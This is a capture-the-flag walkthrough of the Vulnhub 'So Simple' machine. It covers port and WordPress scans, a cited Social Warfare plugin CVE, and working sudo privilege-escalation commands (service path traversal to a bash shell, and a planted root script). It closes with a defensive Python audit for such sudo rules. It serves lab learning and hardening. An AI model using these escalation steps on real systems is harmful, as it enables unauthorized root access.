Today we are going to hack the Vulnhub machine called So Simple. You can download it from the following link:
So Simple
Enumeration
We start with an nmap scan to see which ports are open.
~ > nmap -A -p- 192.168.1.64
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-27 01:36 CEST
Nmap scan report for so-simple.home (192.168.1.64)
Host is up (0.00045s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: So Simple
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.30 seconds
We explore the Apache server in more detail to see if we can find any interesting directory.
We see that there is apparently a WordPress installation.
We use wpscan to look at it in more detail.
~ > wpscan --url http://192.168.1.64/wordpress
WordPress Security Scanner by the WPScan Team
Version 3.8.2
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.1.64/wordpress/ [192.168.1.64]
[+] Started: Mon Jul 27 01:38:56 2020
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.1.64/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://192.168.1.64/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.1.64/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.1.64/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.4.2 identified (Latest, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.1.64/wordpress/index.php/feed/, https://wordpress.org/?v=5.4.2
| - http://192.168.1.64/wordpress/index.php/comments/feed/, https://wordpress.org/?v=5.4.2
[+] WordPress theme in use: twentynineteen
| Location: http://192.168.1.64/wordpress/wp-content/themes/twentynineteen/
| Latest Version: 1.6 (up to date)
| Last Updated: 2020-06-10T00:00:00.000Z
| Readme: http://192.168.1.64/wordpress/wp-content/themes/twentynineteen/readme.txt
| Style URL: http://192.168.1.64/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.6
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.6 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.1.64/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.6, Match: 'Version: 1.6'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] simple-cart-solution
| Location: http://192.168.1.64/wordpress/wp-content/plugins/simple-cart-solution/
| Last Updated: 2020-02-21T23:06:00.000Z
| [!] The version is out of date, the latest version is 1.0.0
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 0.2.0 (100% confidence)
| Found By: Query Parameter (Passive Detection)
| - http://192.168.1.64/wordpress/wp-content/plugins/simple-cart-solution/assets/dist/js/public.js?ver=0.2.0
| Confirmed By:
| Readme - Stable Tag (Aggressive Detection)
| - http://192.168.1.64/wordpress/wp-content/plugins/simple-cart-solution/readme.txt
| Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.1.64/wordpress/wp-content/plugins/simple-cart-solution/readme.txt
[+] social-warfare
| Location: http://192.168.1.64/wordpress/wp-content/plugins/social-warfare/
| Last Updated: 2020-04-14T17:03:00.000Z
| [!] The version is out of date, the latest version is 4.0.1
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Comment (Passive Detection)
|
| Version: 3.5.0 (100% confidence)
| Found By: Comment (Passive Detection)
| - http://192.168.1.64/wordpress/, Match: 'Social Warfare v3.5.0'
| Confirmed By:
| Query Parameter (Passive Detection)
| - http://192.168.1.64/wordpress/wp-content/plugins/social-warfare/assets/css/style.min.css?ver=3.5.0
| - http://192.168.1.64/wordpress/wp-content/plugins/social-warfare/assets/js/script.min.js?ver=3.5.0
| Readme - Stable Tag (Aggressive Detection)
| - http://192.168.1.64/wordpress/wp-content/plugins/social-warfare/readme.txt
| Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.1.64/wordpress/wp-content/plugins/social-warfare/readme.txt
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <==================================================> (21 / 21) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
[+] Finished: Mon Jul 27 01:39:03 2020
[+] Requests Done: 54
[+] Cached Requests: 5
[+] Data Sent: 13.004 KB
[+] Data Received: 546.451 KB
[+] Memory used: 202.164 MB
[+] Elapsed time: 00:00:06
Exploitation
We find the social warfare plugin, which is out of date.
We look for a vulnerability in it and find the following [1].
In /var/www/html we create shell.txt:
We use the key to connect as max over ssh.
~ > ssh max@192.168.1.64 -i key
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon Jul 27 20:01:31 UTC 2020
System load: 0.09
Usage of /: 56.6% of 8.79GB
Memory usage: 31%
Swap usage: 0%
Processes: 136
Users logged in: 0
IPv4 address for docker0: 172.17.0.1
IPv4 address for enp0s3: 192.168.1.64
IPv6 address for enp0s3: 2a01:c50e:21e3:0:a00:27ff:fed8:65bd
* "If you've been waiting for the perfect Kubernetes dev solution for
macOS, the wait is over. Learn how to install Microk8s on macOS."
https://www.techrepublic.com/article/how-to-install-microk8s-on-macos/
47 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Wed Jul 15 19:18:39 2020 from 192.168.1.7
max@so-simple:~$
max@so-simple:~$ sudo -l
Matching Defaults entries for max on so-simple:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User max may run the following commands on so-simple:
(steven) NOPASSWD: /usr/sbin/service
We see that we can run service as "steven", so we use it to obtain steven's privileges.
max@so-simple:~$ sudo -u steven service ../../bin/bash
steven@so-simple:/$ id
uid=1001(steven) gid=1001(steven) groups=1001(steven)
user2.txt
steven@so-simple:/tmp$ cd ~
steven@so-simple:/home/steven$ ls
user2.txt
steven@so-simple:/home/steven$ cat user2.txt
b662b31b7d8cb9f5cdc9c2010337f9b8
We check whether we can do anything with sudo.
steven@so-simple:/$ sudo -l
Matching Defaults entries for steven on so-simple:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User steven may run the following commands on so-simple:
(root) NOPASSWD: /opt/tools/server-health.sh
Privilege Escalation
We see that we can run as root a .sh script that does not exist.
We create the required directories and the script, which will contain "/bin/bash".
Finally, we give it execute permission and run it with sudo to obtain root privileges.
With this we are root on the machine.
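Both sudo rules on this box (service runnable as steven, and a script that does not exist runnable as root) are the kind of misconfiguration a host audit should catch before an attacker does. The following Python is an added example and not part of the original writeup: it parses rules in the format `sudo -l` prints, and flags a dangling target, a group/world-writable directory on the command path, and a binary such as service that executes a caller-supplied path; it runs against a filesystem constructed in a temp dir, where a writable /opt with no /opt/tools is an assumption.

```python
import re
import stat
import tempfile
from pathlib import Path

# Rule format as printed by `sudo -l`, e.g. "(steven) NOPASSWD: /usr/sbin/service".
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s+(?:[A-Z]+:\s*)*(?P<cmd>\S+)\s*(?P<args>.*)$")
# Commands that execute a path passed as their argument (service runs "$1" when it has a slash).
PATH_EXEC_BINARIES = {"service"}   # extend with other such binaries as needed

def audit_rule(rule: str, root: str = "/") -> list:
    """Return finding strings for one sudo rule, resolving command paths under root."""
    m = RULE_RE.match(rule.strip())
    if not m:
        return ["unparsed rule: %r" % rule]
    runas, cmd, args = m.group("runas"), m.group("cmd"), m.group("args").strip()
    if cmd == "ALL":
        return ["(%s) grants any command" % runas]
    rootp, findings = Path(root), []
    target = rootp / cmd.lstrip("/")
    if not target.exists():
        findings.append("(%s) %s: target does not exist; whoever can create it runs as %s" % (runas, cmd, runas))
    # Walk from the command up to root: a group/world-writable directory anywhere on the
    # path lets an unprivileged user create or replace the command.
    node = target
    while True:
        if node.exists() and node.lstat().st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            rel = node.relative_to(rootp)
            findings.append("(%s) %s: %s is group/world writable" % (runas, cmd, "/" + rel.as_posix() if rel.parts else "/"))
        if node == rootp:
            break
        node = node.parent
    if Path(cmd).name in PATH_EXEC_BINARIES and not args:
        findings.append("(%s) %s: executes a caller-supplied path and the rule does not pin arguments" % (runas, cmd))
    return findings

def demo() -> dict:
    """Audit the page's two rules against a constructed filesystem in a temp dir."""
    root = tempfile.mkdtemp()
    sbin = Path(root, "usr", "sbin")
    sbin.mkdir(parents=True)
    for d in (sbin, sbin.parent):   # pin modes so the result does not depend on umask
        d.chmod(0o755)
    (sbin / "service").write_text("#!/bin/sh\n")
    (sbin / "service").chmod(0o755)
    opt = Path(root, "opt")         # constructed: /opt is writable and /opt/tools is absent
    opt.mkdir()
    opt.chmod(0o777)
    rules = ["(steven) NOPASSWD: /usr/sbin/service", "(root) NOPASSWD: /opt/tools/server-health.sh"]
    return {r: audit_rule(r, root) for r in rules}
```

Run `audit_rule` over the output of `sudo -l` (or the parsed contents of /etc/sudoers) on a real host; the fix for both findings is to point rules only at existing, root-owned files in root-owned directories and to pin the arguments of anything that executes a path.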
[1] https://unit42.paloaltonetworks.com/exploits-in-the-wild-for-wordpress-social-warfare-plugin-cve-2019-9978/